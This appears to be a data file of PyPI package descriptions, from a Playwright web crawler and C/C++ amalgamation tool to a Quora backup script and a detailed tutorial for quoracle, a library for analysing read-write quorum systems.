Leveraging the power of Playwright, it utilizes multiple processes, each containing a single coroutine, for efficient parallel execution. This architecture excels in handling both IO and CPU-bound workloads when ample resources are available.Multi-threaded Crawling with Ease:Quokka'sBaseCrawlerclass enables users to effortlessly transition from single-threaded to multi-threaded crawling. By taking advantage of the provided crawler template, you can seamlessly convert a single-threaded crawler into a multi-threaded one.Easy Browser Management: Quokka'sAgentclass provides a streamlined interface for managing browser instances, including starting, stopping, and page navigation.Data Extraction: With thedata_extractormodule, Quokka allows you to easily extract data from web pages using customizable selectors and extraction patterns.Page Interaction: Thepage_interactormodule enables you to interact with web page elements, such as clicking, typing, and scrolling, making automation tasks a breeze.Custom Hooks: Quokka supports customizable hooks, allowing you to extend and customize the behavior of theAgentclass to fit your specific needs.Extensible: Quokka exposes Playwright'splaywrightandpageinstances, enabling users to extend the library's functionality as required.Installationpipinstallquokka-webGetting StartedQuokka's intuitive API makes browser automation a straightforward process. Here's a simple example:fromquokka_webimportAgentasyncdefmain():agent=awaitAgent.instantiate(headless=True)awaitagent.start()# Your automation code hereawaitagent.stop()if__name__==\"__main__\":importasyncioasyncio.run(main())DocumentationFor detailed usage instructions, examples, and customization options, please refer to theDocumentation.ExamplesBase Crawler Example:fromquokka_webimportBaseCrawler,DebuggerclassMyCrawler(BaseCrawler):asyncdef_crawl(self,*args,**kwargs):# Core crawling logic using browser_agentif__name__==\"__main__\":importasyncioasyncdefmain():crawler=awaitMyCrawler.instantiate(debug_tool=Debugger(verbose=True))awaitcrawler.start()awaitcrawler.crawl()awaitcrawler.stop()asyncio.run(main())ContributingContributions to Quokka are welcome! Please read ourContribution Guidelinesfor more information on how to contribute to the project.LicenseThis project is licensed under theMIT License."} +{"package": "quoll", "pacakge-description": "quollImage quality assessment for electron tomographyInstallationUsers who prefer graphical user interfaces (i.e. Napari)Find Quoll's Napari plugin (napari-quoll)hereUsers (pip)Create a new conda environment, name it whatever you'd like, but don't forget to activate itconda create -n quoll python=3.7\nconda activate quollPip installpip install quollDevelopersClone the repository. In a terminal:git clone https://github.com/rosalindfranklininstitute/quoll.gitNavigate to the Quoll directory and create a new conda environment for Quoll. Don't forget to activate this environmentconda env create -n quoll python=3.7\nconda activate quollPip install the quoll packagepip install -e .ExamplesTheexamplesfolder contains Jupyter notebooks for example usage.Alternatively thetestsalso go through some ways of using quoll.CLI Usage examplesTo use the one-image FRC in the command line, once Quoll is installed.oneimgFRC -hbrings up the help options for the one image FRCTo run the one image FRC on a single image without tiling (i.e., estimate resolution of the entire image),oneimgFRC To run the one image FRC on a single image split into square tiles of lengthnpixels,oneimgFRC --tile_size --tiles_dir The resolution results, resolution heatmap, and the overlay of the resolution heatmap on the image can be saved with the flags--save_csv,--save_overlay,--save_heatmap.The resolution heatmap overlaid on the original image can be displayed with the--show_plotflag."} +{"package": "quoll-compatible-miplib", "pacakge-description": "No description available on PyPI."} +{"package": "quollio-core", "pacakge-description": "quollio-coreDescription (\u8aac\u660e)This Python library collects advanced metadata like table to table lineage or anomaly record and ingests them to QDC.\u3053\u306ePython\u30e9\u30a4\u30d6\u30e9\u30ea\u306f\u3001\u30c6\u30fc\u30d6\u30eb\u9593\u306e\u30ea\u30cd\u30fc\u30b8\u3084\u30c7\u30fc\u30bf\u306e\u7d71\u8a08\u5024\u306a\u3069\u306e\u30e1\u30bf\u30c7\u30fc\u30bf\u3092\u53d6\u5f97\u3057\u3001\u30c7\u30fc\u30bf\u30ab\u30bf\u30ed\u30b0\u306e\u30a2\u30bb\u30c3\u30c8\u306b\u53cd\u6620\u3057\u307e\u3059\u3002Prerequisite (\u524d\u63d0\u6761\u4ef6)Before you begin to use this, you need to do the following.Add your assets to QDC with metadata agent.Issue client id and client secret on QDC for External API.\u3053\u306e\u30b7\u30b9\u30c6\u30e0\u3092\u4f7f\u7528\u3059\u308b\u524d\u306b\u3001\u4ee5\u4e0b\u306e\u624b\u9806\u3092\u5b9f\u884c\u3059\u308b\u5fc5\u8981\u304c\u3042\u308a\u307e\u3059\u3002Metadata Agent\u3092\u4f7f\u7528\u3057\u3066\u3001\u30c7\u30fc\u30bf\u30ab\u30bf\u30ed\u30b0\u306b\u30a2\u30bb\u30c3\u30c8\u3092\u767b\u9332\u3059\u308b\u3002\u5916\u90e8API\u7528\u306e\u3001\u30c7\u30fc\u30bf\u30ab\u30bf\u30ed\u30b0\u4e0a\u3067\u8a8d\u8a3c\u306b\u5fc5\u8981\u306a\u30af\u30e9\u30a4\u30a2\u30f3\u30c8ID\u3068\u30b7\u30fc\u30af\u30ec\u30c3\u30c8\u3092\u767a\u884c\u3059\u308b\u3002Install (\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb)Install with the following command.\u4e0b\u8a18\u306e\u30b3\u30de\u30f3\u30c9\u3067\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u3066\u304f\u3060\u3055\u3044\u3002$ pip install quollio-coreTo see available commands and options, please run the following command. (ex: Snowflake)\u30b3\u30de\u30f3\u30c9\u3084\u30aa\u30d7\u30b7\u30e7\u30f3\u306e\u8a73\u7d30\u306b\u3064\u3044\u3066\u306f\u3001\u4e0b\u8a18\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066\u304f\u3060\u3055\u3044\u3002(\u4f8b: Snowflake)$ python3 -m quollio_core.snowflake -hThen run commands with the options provided.\u305d\u306e\u5f8c\u3001\u30aa\u30d7\u30b7\u30e7\u30f3\u3092\u6307\u5b9a\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066\u304f\u3060\u3055\u3044\u3002Command (\u30b3\u30de\u30f3\u30c9)Description (\u6982\u8981)build_viewBuild views for lineage and statistics.\u30ea\u30cd\u30fc\u30b8\u3068\u7d71\u8a08\u60c5\u5831\u3092\u751f\u6210\u3059\u308b\u30d3\u30e5\u30fc\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002load_lineageLoad lineage from created views to Quollio.\u4f5c\u6210\u3057\u305f\u30d3\u30e5\u30fc\u304b\u3089\u30ea\u30cd\u30fc\u30b8\u30c7\u30fc\u30bf\u3092Quollio\u306b\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002load_statsLoad statistics from created views to Quollio.\u4f5c\u6210\u3057\u305f\u30d3\u30e5\u30fc\u304b\u3089\u7d71\u8a08\u60c5\u5831\u3092Quollio\u306b\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002Development (\u958b\u767a)Install (\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb)Create.envfile in the root level of repository and set the following environment variables.\u30ea\u30dd\u30b8\u30c8\u30ea\u306e\u30eb\u30fc\u30c8\u30ec\u30d9\u30eb\u306b.env\u30d5\u30a1\u30a4\u30eb\u3092\u4f5c\u6210\u3057\u3001\u4e0b\u8a18\u306e\u74b0\u5883\u5909\u6570\u3092\u8a2d\u5b9a\u3057\u3066\u304f\u3060\u3055\u3044\u3002AWS_REGION=[AWS region]\nIMAGE_NAME=[Container image name you want to use]To install local packages, run the following command.\u30ed\u30fc\u30ab\u30eb\u30d1\u30c3\u30b1\u30fc\u30b8\u3092\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3059\u308b\u306b\u306f\u3001\u4e0b\u8a18\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066\u304f\u3060\u3055\u3044\u3002$ make installBuild (\u30d3\u30eb\u30c9)To build Docker image with local files, run the following command.\u30ed\u30fc\u30ab\u30eb\u30d5\u30a1\u30a4\u30eb\u3067Docker image\u3092\u30d3\u30eb\u30c9\u3059\u308b\u306b\u306f\u3001\u4e0b\u8a18\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066\u304f\u3060\u3055\u3044\u3002$ make build-localUnit test (\u30e6\u30cb\u30c3\u30c8\u30c6\u30b9\u30c8)To run unit tests, run the following command.\u30e6\u30cb\u30c3\u30c8\u30c6\u30b9\u30c8\u3092\u5b9f\u884c\u3059\u308b\u306b\u306f\u3001\u4e0b\u8a18\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066\u304f\u3060\u3055\u3044\u3002$ make testDocs (\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8)To auto generate docs for dbt, run the following command. (ex. Snowflake)dbt\u306e\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u3092\u81ea\u52d5\u751f\u6210\u3059\u308b\u306b\u306f\u3001\u4e0b\u8a18\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3057\u3066\u304f\u3060\u3055\u3044\u3002(\u4f8b: Snowflake)$ cd quollio_core/dbt_projects/snowflake\n$ dbt-osmosis yaml refactor \\\n--force-inheritance \\\n--project-dir ./ \\\n--profiles-dir ./profiles \\\n--vars '{query_role: , sample_method: SAMPLE(10)}'Push (\u30d7\u30c3\u30b7\u30e5)The push command inMakefileis for pushing the image to ECR. If you want to push the image to other container registry, please change the command.Makefile\u306epush\u30b3\u30de\u30f3\u30c9\u306f\u3001ECR\u306b\u30a4\u30e1\u30fc\u30b8\u3092\u30d7\u30c3\u30b7\u30e5\u3059\u308b\u305f\u3081\u306e\u3082\u306e\u3067\u3059\u3002\u4ed6\u306e\u30b3\u30f3\u30c6\u30ca\u30ec\u30b8\u30b9\u30c8\u30ea\u306b\u30a4\u30e1\u30fc\u30b8\u3092\u30d7\u30c3\u30b7\u30e5\u3059\u308b\u5834\u5408\u306f\u3001\u30b3\u30de\u30f3\u30c9\u3092\u5909\u66f4\u3057\u3066\u304f\u3060\u3055\u3044\u3002License (\u30e9\u30a4\u30bb\u30f3\u30b9)This library is licensed under the AGPL-3.0 License, but the dependencies are not licensed under the AGPL-3.0 License but under their own licenses. You may change the source code of the dependencies within the scope of their own licenses. Please refer topyproject.tomlfor the dependencies.\u3053\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u306fAGPL-3.0\u30e9\u30a4\u30bb\u30f3\u30b9\u3067\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3059\u304c\u3001\u4f9d\u5b58\u95a2\u4fc2\u306fAGPL-3.0\u30e9\u30a4\u30bb\u30f3\u30b9\u3067\u306f\u306a\u304f\u3001\u305d\u308c\u305e\u308c\u306e\u30e9\u30a4\u30bb\u30f3\u30b9\u3067\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u4f9d\u5b58\u95a2\u4fc2\u306e\u30bd\u30fc\u30b9\u30b3\u30fc\u30c9\u306f\u3001\u305d\u308c\u305e\u308c\u306e\u30e9\u30a4\u30bb\u30f3\u30b9\u306e\u7bc4\u56f2\u5185\u3067\u5909\u66f4\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u4f9d\u5b58\u95a2\u4fc2\u306b\u3064\u3044\u3066\u306f\u3001pyproject.toml\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002"} +{"package": "quollio-data-profiler", "pacakge-description": "quollio-data-profilerDescriptionThis system collects advanced metadata like table to table lineage or anomaly record and ingests them to QDC.PrerequisiteBefore you begin to use this, you need to do the following.Add your assets to QDC with metadata agent.Issue External API client id and client secret on QDC.InstallInstall with the following command.pip install quollio-data-profilerUsageHere is an example of creating a view for snowflake lineage. Please enter any values for <>.from quollio_data_profiler.repository.qdc import QDCExternalAPIClient\nfrom quollio_data_profiler.repository.snowflake import SnowflakeConnectionConfig\nfrom quollio_data_profiler.snowflake_lineage_profiler import execute\n\n\ndef view_build_only():\n company_id = \"\"\n build_view_connection = SnowflakeConnectionConfig(\n account_id=\"\",\n account_role=\"\",\n account_user=\"\",\n account_password=\"\",\n account_warehouse=\"\", \n )\n qdc_client = QDCExternalAPIClient(\n client_id=\"\",\n client_secret=\"\",\n base_url=\"\",\n )\n execute(\n company_id=company_id,\n sf_build_view_connections=build_view_connection,\n qdc_client=qdc_client,\n is_view_build_only=True,\n )\n\nif __name__ == \"__main__\":\n view_build_only()Please refer to the scripts in./examplesfor other usages.DevelopmentHow to testUnittestRunmake test"} +{"package": "quom", "pacakge-description": "QuomQuom is a single file generator for C/C++.It resolves all included local headers starting with your main C/C++ file. This is also known as amalgamation.Afterwards, it tries to find the related source files and their headers and places them at the end of the main file\nor at a specific stitch location if provided.At the end there will be one single file with all your header and sources joined together.Installationpip install --user quomRequires Python 3.7 or later.How to use itusage: quom [-h] [--stitch format] [--include_guard format] [--trim]\n input output\n\nSingle header generator for C/C++ libraries.\n\npositional arguments:\n input Input file path of the main file.\n output Output file path of the generated single header file.\n\noptional arguments:\n -h, --help show this help message and exit\n --stitch format, -s format\n Format of the comment where the source files should be placed\n (e.g. // ~> stitch <~). Default: None (at the end of the main file)\n --include_guard format, -g format\n Regex format of the include guard. Default: None\n --trim, -t Reduce continuous line breaks to one. Default: True\n --include_directory INCLUDE_DIRECTORY, -I INCLUDE_DIRECTORY\n Add include directories for header files.\n --source_directory SOURCE_DIRECTORY, -S SOURCE_DIRECTORY\n Set the source directories for source files.\n Use ./ in front of a path to mark as relative to the header file.\n --encoding ENCODING, -e ENCODING\n The encoding used to read and write all files.Simple exampleThe project:|-src/\n| |-foo.hpp\n| |-foo.cpp\n| -main.cpp\n|-out/\n -main_gen.cppfoo.hpp#pragma onceintfoo();foo.cpp#include\"foo.hpp\"intfoo(){return0;}main.cpp#include\"foo.hpp\"intmain(){returnfoo();}The command:quom src/main.hpp main_gen.cppmain_gen.cppintfoo();intmain(){returnfoo();}intfoo(){return0;}Advanced exampleThe project:|-src/\n| |-foo.hpp\n| |-foo.cpp\n| -foobar.hpp\n|-out/\n -foobar_gen.hppfoo.hpp#pragma once#ifndef FOOBAR_FOO_HPP#define FOOBAR_FOO_HPPexternintfoo;#endiffoo.cpp#include\"foo.hpp\"intfoo=42;foobar.hpp#pragma once#ifndef FOOBAR_HPP#define FOOBAR_HPP#include\"foo.hpp\"#endif#ifdef FOO_MAIN// ~> stitch <~#endifThe command:quom src/foobar.hpp foobar_gen.hpp -s \"~> stitch <~\" -g FOOBAR_.+_HPPfoobar_gen.hpp#pragma once#ifndef FOOBAR_HPP#define FOOBAR_HPPexternintfoo;#endif#ifdef FOO_MAINintfoo=42;#endifTake a look into theexamples folderfor more."} +{"package": "quool", "pacakge-description": "QuoolFinancial Data Analysis ToolkitThis toolkit provides a comprehensive suite of modules for financial data analysis, including web requests, data processing, and logging. Designed with ease of use and efficiency in mind, it's an ideal solution for analysts and developers working in financial data analytics.FeaturesRequest Module: Interfaces with various financial data APIs and web scraping for stock market information.Tool Module: A collection of utility functions for data parsing, logging, memory optimization, and more.Custom Logging: Enhanced logging capabilities for both console and file output with customizable formats.Modules1. Request ModuleHandles various types of web requests and interactions with APIs. It includes classes for:AkShare: Fetching financial data using the AkShare API.Em: Interacting with East Money (\u4e1c\u65b9\u8d22\u5bcc\u7f51) for financial data and analysis.StockUS: Accessing US stock market data and research reports.WeiXin: Interfacing with WeChat for functionalities like QR code-based login and notifications.2. Tool ModuleProvides utility functions and classes to support operations such as:Logger: Enhanced logging with configurable display options.Date Parsing: Converts date strings intopandas.Timestampobjects.Memory Optimization: Reduces memory usage of pandas DataFrames.InstallationTo use this toolkit, clone the repository to your local machine:bashCopy codegit clone https://github.com/ppoak/quoolUsageHere's a quick example of how to use theAkShareclass to fetch daily market data:pythonCopy codeimport quool.request as qr\ndaily_data = qr.AkShare.market_daily('600000', start='20200101', end='20201231')For logging:pythonCopy codeimport quool.tool import qt\nlogger = qt.Logger(name=\"MyLogger\", level=logging.INFO, file=\"log.txt\")\nlogger.info(\"This is an info message\")ContributingContributions to improve this toolkit are welcome. Please fork the repository and submit a pull request with your changes.LicenseThis project is licensed underMIT License."} +{"package": "quora", "pacakge-description": "pyquora=======Note: parts of this library may be broken due to changes on Quora's end. Issues and pull requests welcome.----------------------------------------------------------------------------------------------------------|Build Status|A Python module to fetch and parse data from Quora.Table of Contents------------------ `Installation <#installation>`__- `Usage <#usage>`__- `Features <#features>`__- `Contribute <#contribute>`__- `Projects using ``pyquora`` <#projects-using-pyquora>`__Installation------------You will need `Python 2 `__.`pip `__ isrecommended for installing dependencies.Install using pip:::pip install quoraUsage-----User statistics~~~~~~~~~~~~~~~.. code:: pythonfrom quora import Useruser = User('Christopher-J-Su')# Get user activityactivity = user.activity# Do stuff with the parsed activity dataprint activity# Get user statisticsstats = user.stats# Take a ganderprint statsQuestions~~~~~~~~~.. code:: pythonfrom quora import Quora# Get question statisticsquestion = Quora.get_question_stats('what-is-python')# question is:# {# 'want_answers': 3,# 'question_text': u'What is python?',# 'topics': [u'Science, Engineering, and Technology', u'Technology', u'Electronics', u'Computers'],# 'question_details': None, 'answer_count': 1,# 'answer_wiki': '
',# }Answer statistics~~~~~~~~~~~~~~~~~.. code:: pythonfrom quora import Quora# The function can be called in any of the following ways.answer = Quora.get_one_answer('http://qr.ae/6hARL')answer = Quora.get_one_answer('6hARL')answer = Quora.get_one_answer(question, author) # question and answer are variables# answer is:# {# 'want_answers': 8,# 'views': 197,# 'author': u'Mayur-P-R-Rohith',# 'question_link': u'https://www.quora.com/Does-Quora-similar-question-search-when-posing-a-new-question-work-better-than-the-search-box-ove',# 'comment_count': 1,# 'answer': '...',# 'upvote_count': 5# }# Get the latest answers from a questionlatest_answers = Quora.get_latest_answers('what-is-python')Features--------Currently implemented~~~~~~~~~~~~~~~~~~~~~- User statistics- User activity- Question statistics- Answer statisticsTo do~~~~~- Detailed user information (followers, following, etc.; not juststatistics)"} +{"package": "quorabackup", "pacakge-description": "============quora-backup============A syncing approach to backing up Quora answers, questions, votes, and follows. Rather than fetching your entire history of Quora activity all at once, quora-backup checks your recent Quora activity and saves only the new entries. **Run it regularly to maintain a full backup.** This not only allows backups to be performed faster and more frequently, but also makes less requests to Quora's servers and doesn't face request rate-limiting issues like some older backup techniques do. It supports backing up to **JSON and CSV**. More file formats and databases to come.Installation============You will need [Python 2](https://www.python.org/download/). [pip](http://pip.readthedocs.org/en/latest/installing.html) is recommended for installing dependencies.$ git clone https://github.com/csu/quora-backup.git$ cd quora-backup$ pip install -r requirements.txtInstalling without git----------------------For the less technical users who want to use quora-backup without installing git:1. [Download quora-backup](https://github.com/csu/quora-backup/archive/master.zip) and extract the files from the `.zip` archive2. Open a terminal or command prompt window and enter the folder using `cd`3. Run `pip install -r requirements.txt` (after installing Python and pip)Usage=====$ python backup.py Christopher-J-Su # defaults to flat-file json backupsTo access the help for the options and arguments:$ python backup.py --helpUsage: backup.py [OPTIONS] USEROptions:-p, --path TEXT Specify a path at which to store thebackup files.-t, --type [answers|questions|upvotes|question_follows]Specify only one type of activity to bebacked up.-f, --format [json|csv] Specify a format for the backup. Defaultsto JSON.--help Show this message and exit. Show this message and exit.Backup Formats==============To specify a format for your backup:$ python backup.py --format csv Christopher-J-SuFor a list of available backup formats, read the help (see [Usage](#usage) section).JSON Backup Details-------------------Your content will be stored in the following files, in whatever directory you run the above command in:answers.jsonquestions.jsonupvotes.jsonquestion_follows.jsonCSV Backup Details------------------Your content will be stored in the following files, in whatever directory you run the above command in:answers.csvquestions.csvupvotes.csvquestion_follows.csvThe resulting CSV output will have columns (fields/attributes) delimited by commas and rows (entries) delimited by new lines. The first row will be a header row, containing the names of the fields.Specifying an Activity======================You can also specify only one activity to be backed up. For instance, to only back up answers:$ python backup.py --type answers Christopher-J-Su"} +{"package": "quorachallenge", "pacakge-description": "IntroductionThe framework for the Quora development challenges - supporting project description and testing.FeaturesIn Browser display of challenge description/requirementsautomated testing against pre-defined test datadisplay of pre-defined test datadata and description downloaded from central repositoryInstallationInstallation is very simple :$pipinstallquorachallengeTo upgrade an existing installation use$pipinstall--upgradequorachallengeGetting StartedSeeFull Documentationfor information on how to get started, and details of the full framework features.Further InformationFull DocumentationOn PyPi (Python Package Index)Source code on GitHubTroubleshooting & BugsNoteEvery care is taken to try to ensure that this code comes to you bug free.\nIf you do find an error - please report the problem on :GitHub IssuesBy email to :Tony FluryLicenseThis software is covered by the provisions ofMITLicense.BugsEvery care is taken to try to ensure that this code comes to you bug free.\nIf you do find an error - please report the problem on :GitHubor\nby email to :Tony Flury"} +{"package": "quoracle", "pacakge-description": "QuoracleQuoracle is a library for constructing and analyzingread-write quorum\nsystems. Runpip install quoracleand then follow along with the tutorial below to get\nstarted. You can find more information on Quoracle in ourPaPoC '21\npaper.TutorialQuorum SystemsGiven a set of nodesX, aread-write quorum systemis a pair(R, W)whereRis a set of subsets ofXcalledread quorums,Wis a set of subsets ofXcalledwrite quorums, andevery read quorum intersects every write quorum.quoracle allows us to construct and analyze arbitrary read-write quorum\nsystems. First, we import the library.fromquoracleimport*Next, we specify the nodes in our quorum system. Our nodes can be strings,\nintegers, IP addresses, anything!>>>a=Node('a')>>>b=Node('b')>>>c=Node('c')>>>d=Node('d')>>>e=Node('e')>>>f=Node('f')Now, we construct a two by three grid of nodes. Every row is read quorum, and\none element from every row is a write quorum. Note that when we construct a\nquorum system, we only have to specify the set of read quorums. The library\nfigures out the optimal set of write quorums automatically.>>>grid=QuorumSystem(reads=a*b*c+d*e*f)This next code snippet prints out the read quorums.>>>forringrid.read_quorums():...print(r){'a','b','c'}{'d','e','f'}And this next code snippet prints out the write quorums.>>>forwingrid.write_quorums():...print(w){'a','d'}{'a','e'}{'a','f'}{'b','d'}{'b','e'}{'b','f'}{'c','d'}{'c','e'}{'c','f'}Alternatively, we can construct a quorum system be specifying the write\nquorums.>>>QuorumSystem(writes=(a+b+c)*(d+e+f))Or, we can specify both the read and write quorums.>>>QuorumSystem(reads=a*b*c+d*e*f,writes=(a+b+c)*(d+e+f))But, remember that every read quorum must intersect every write quorum. If we\ntry to construct a quorum system with non-overlapping quorums, an exception\nwill be thrown.>>>QuorumSystem(reads=a+b+c,writes=d+e+f)Traceback(mostrecentcalllast):...ValueError:NotallreadquorumsintersectallwritequorumsWe can check whether a given set is a read or write quorum. Note that any\nsuperset of a quorum is also considered a quorum.>>>grid.is_read_quorum({'a','b','c'})True>>>grid.is_read_quorum({'a','b','c','d'})True>>>grid.is_read_quorum({'a','b','d'})False>>>>>>grid.is_write_quorum({'a','d'})True>>>grid.is_write_quorum({'a','d','d'})True>>>grid.is_write_quorum({'a','b'})FalseResilienceTheread resilienceof our quorum system is the largest numberfsuch that\ndespite the failure of anyfnodes, we still have at least one read quorum.Write resilienceis defined similarly, andresilienceis the minimum of\nread and write resilience.Here, we print out the read resilience, write resilience, and resilience of our\ngrid quorum system. We can fail any one node and still have a read quorum, but\nif we fail one node from each row, we eliminate every read quorum, so the read\nresilience is 1. Similarly, we can fail any two nodes and still have a write\nquorum, but if we fail one node from every column, we eliminate every write\nquorum, so our write resilience is 1. The resilience is the minimum of 1 and 2,\nwhich is 1.>>>grid.read_resilience()1>>>grid.write_resilience()2>>>grid.resilience()1StrategiesAstrategyis a discrete probability distribution over the set of read and\nwrite quorums. A strategy gives us a way to pick quorums at random. We'll see\nhow to construct optimal strategies in a second, but for now, we'll construct a\nstrategy by hand. To do so, we have to provide a probability distribution over\nthe read quorums and a probability distribution over the write quorums. Here,\nwe'll pick the top row twice as often as the bottom row, and we'll pick each\ncolumn uniformly at random. Note that when we specify a probability\ndistribution, we don't have to provide exact probabilities. We can simply pass\nin weights, and the library will automatically normalize the weights into a\nvalid probability distribution.>>># The read quorum strategy.>>>sigma_r={...frozenset({'a','b','c'}):2.,...frozenset({'d','e','f'}):1.,...}>>>>>># The write quorum strategy.>>>sigma_w={...frozenset({'a','d'}):1.,...frozenset({'b','e'}):1.,...frozenset({'c','f'}):1.,...}>>>strategy=grid.make_strategy(sigma_r,sigma_w)Once we have a strategy, we can use it to sample read and write quorums. Here,\nwe expectget_read_quorumto return the top row twice as often as the bottom\nrow, and we expectget_write_quorumto return every column uniformly at\nrandom.>>>strategy.get_read_quorum(){'a','b','c'}>>>strategy.get_read_quorum(){'a','b','c'}>>>strategy.get_read_quorum(){'d','e','f'}>>>strategy.get_write_quorum(){'b','e'}>>>strategy.get_write_quorum(){'c','f'}>>>strategy.get_write_quorum(){'b','e'}>>>strategy.get_write_quorum(){'a','d'}Load and CapacityTypically in a distributed system, a read quorum of nodes is contacted to\nperform a read, and a write quorum of nodes is contacted to perform a write.\nAssume we have a workload with aread fractionfrof reads and awrite\nfractionfw = 1 - frof writes. Given a strategy, theload of a nodeis\nthe probability that the node is selected by the strategy. Theload of a\nstrategyis the load of the most heavily loaded node. Theload of a quorum\nsystemis the load of the optimal strategy, i.e. the strategy that achieves\nthe lowest load. The most heavily loaded node in a quorum system is a\nthroughput bottleneck, so the lower the load the better.Let's calculate the load of our strategy assuming a 100% read workload (i.e. a\nworkload with a read fraction of 1).The load ofais 2/3 because the read quorum{a, b, c}is chosen 2/3 of\nthe time.The load ofbis 2/3 because the read quorum{a, b, c}is chosen 2/3 of\nthe time.The load ofcis 2/3 because the read quorum{a, b, c}is chosen 2/3 of\nthe time.The load ofdis 1/3 because the read quorum{d, e, f}is chosen 2/3 of\nthe time.The load ofeis 1/3 because the read quorum{d, e, f}is chosen 2/3 of\nthe time.The load offis 1/3 because the read quorum{d, e, f}is chosen 2/3 of\nthe time.The largest node load is 2/3, so our strategy has a load of 2/3. Rather than\ncalculating load by hand, we can simply call theloadfunction.>>>strategy.load(read_fraction=1)0.6666666666666666Now let's calculate the load of our strategy assuming a 100% write workload.\nAgain, we calculate the load on every node.The load ofais 1/3 because the write quorum{a, d}is chosen 1/3 of\nthe time.The load ofbis 1/3 because the write quorum{b, e}is chosen 1/3 of\nthe time.The load ofcis 1/3 because the write quorum{c, f}is chosen 1/3 of\nthe time.The load ofdis 1/3 because the write quorum{a, d}is chosen 1/3 of\nthe time.The load ofeis 1/3 because the write quorum{b, e}is chosen 1/3 of\nthe time.The load offis 1/3 because the write quorum{c, f}is chosen 1/3 of\nthe time.The largest node load is 1/3, so our strategy has a load of 1/3. Again, rather\nthan calculating load by hand, we can simply call theloadfunction. Note\nthat we can pass in aread_fractionorwrite_fractionbut not both.>>>strategy.load(write_fraction=1)0.3333333333333333Now let's calculate the load of our strategy on a 25% read and 75% write\nworkload.The load ofais0.25 * 2/3 + 0.75 * 1/3 = 5/12because 25% of the time\nwe perform a read and select the read quorum{a, b, c}with 2/3 probability\nand 75% of the time, we perform a write and select the write quorum{a, d}with 1/3 probability.The load ofbis0.25 * 2/3 + 0.75 * 1/3 = 5/12because 25% of the time\nwe perform a read and select the read quorum{a, b, c}with 2/3 probability\nand 75% of the time, we perform a write and select the write quorum{b, e}with 1/3 probability.The load ofcis0.25 * 2/3 + 0.75 * 1/3 = 5/12because 25% of the time\nwe perform a read and select the read quorum{a, b, c}with 2/3 probability\nand 75% of the time, we perform a write and select the write quorum{c, f}with 1/3 probability.The load ofdis0.25 * 1/3 + 0.75 * 1/3 = 1/3because 25% of the time\nwe perform a read and select the read quorum{d, e, f}with 2/3 probability\nand 75% of the time, we perform a write and select the write quorum{a, d}with 1/3 probability.The load ofeis0.25 * 1/3 + 0.75 * 1/3 = 1/3because 25% of the time\nwe perform a read and select the read quorum{d, e, f}with 2/3 probability\nand 75% of the time, we perform a write and select the write quorum{b, e}with 1/3 probability.The load offis0.25 * 1/3 + 0.75 * 1/3 = 1/3because 25% of the time\nwe perform a read and select the read quorum{d, e, f}with 2/3 probability\nand 75% of the time, we perform a write and select the write quorum{c, f}with 1/3 probability.The largest node load is 5/12, so our strategy has a load of 5/12. At this\npoint, you can see that calculating load by hand is extremely tedious. We could\nhave skipped all that work and calledloadinstead!>>>strategy.load(read_fraction=0.25)0.41666666666666663We can also compute the load on every node.>>>print(strategy.node_load(a,read_fraction=0.25))0.41666666666666663>>>print(strategy.node_load(b,read_fraction=0.25))0.41666666666666663>>>print(strategy.node_load(c,read_fraction=0.25))0.41666666666666663>>>print(strategy.node_load(d,read_fraction=0.25))0.3333333333333333>>>print(strategy.node_load(e,read_fraction=0.25))0.3333333333333333>>>print(strategy.node_load(f,read_fraction=0.25))0.3333333333333333Our strategy has a load of 5/12 on a 25% read workload, but what about the\nquorum system? The quorum system doesnothave a load of 5/12 because our\nstrategy is not optimal. We can call thestrategyfunction to compute the\noptimal strategy automatically.>>>strategy=grid.strategy(read_fraction=0.25)>>>strategyStrategy(reads={('a','b','c'):0.5,('d','e','f'):0.5},writes={('a','f'):0.33333333,('b','e'):0.33333333,('c','d'):0.33333333})>>>strategy.load(read_fraction=0.25))0.3749999975Here, we see that the optimal strategy picks all rows and all columns\nuniformly. This strategy has a load of 3/8 on the 25% read workload. Since this\nstrategy is optimal, that means our quorum system also has a load of 3/8 on a\n25% workload.We can also query this strategy's load on other workloads as well. Note that\nthis strategy is optimal for a read fraction of 25%, but it may not be optimal\nfor other read fractions.>>>strategy.load(read_fraction=0)0.33333333>>>strategy.load(read_fraction=0.5)0.416666665>>>strategy.load(read_fraction=1)0.5We can also use a quorum system'sloadfunction. The code snippet below is a\nshorthand forgrid.strategy(read_fraction=0.25).load(read_fraction=0.25).>>>grid.load(read_fraction=0.25)0.3749999975The capacity of strategy or quorum is simply the inverse of the load. Our\nquorum system has a load of 3/8 on a 25% read workload, so it has a capacity of\n8/3.>>>grid.capacity(read_fraction=0.25)2.6666666844444444Thecapacityof a quorum system is proportional to the maximum throughput\nthat it can achieve before a node becomes bottlenecked. Here, if every node\ncould process 100 commands per second, then our quorum system could process\n800/3 commands per second.Workload DistributionsIn the real world, we don't often have a workload with a fixed read fraction.\nWorkloads change over time. Instead of specifying a fixed read fraction, we can\nprovide a discrete probability distribution of read fractions. Here, we say\nthat the read fraction is 10% half the time and 75% half the time.strategywill return the strategy that minimizes the expected load according to 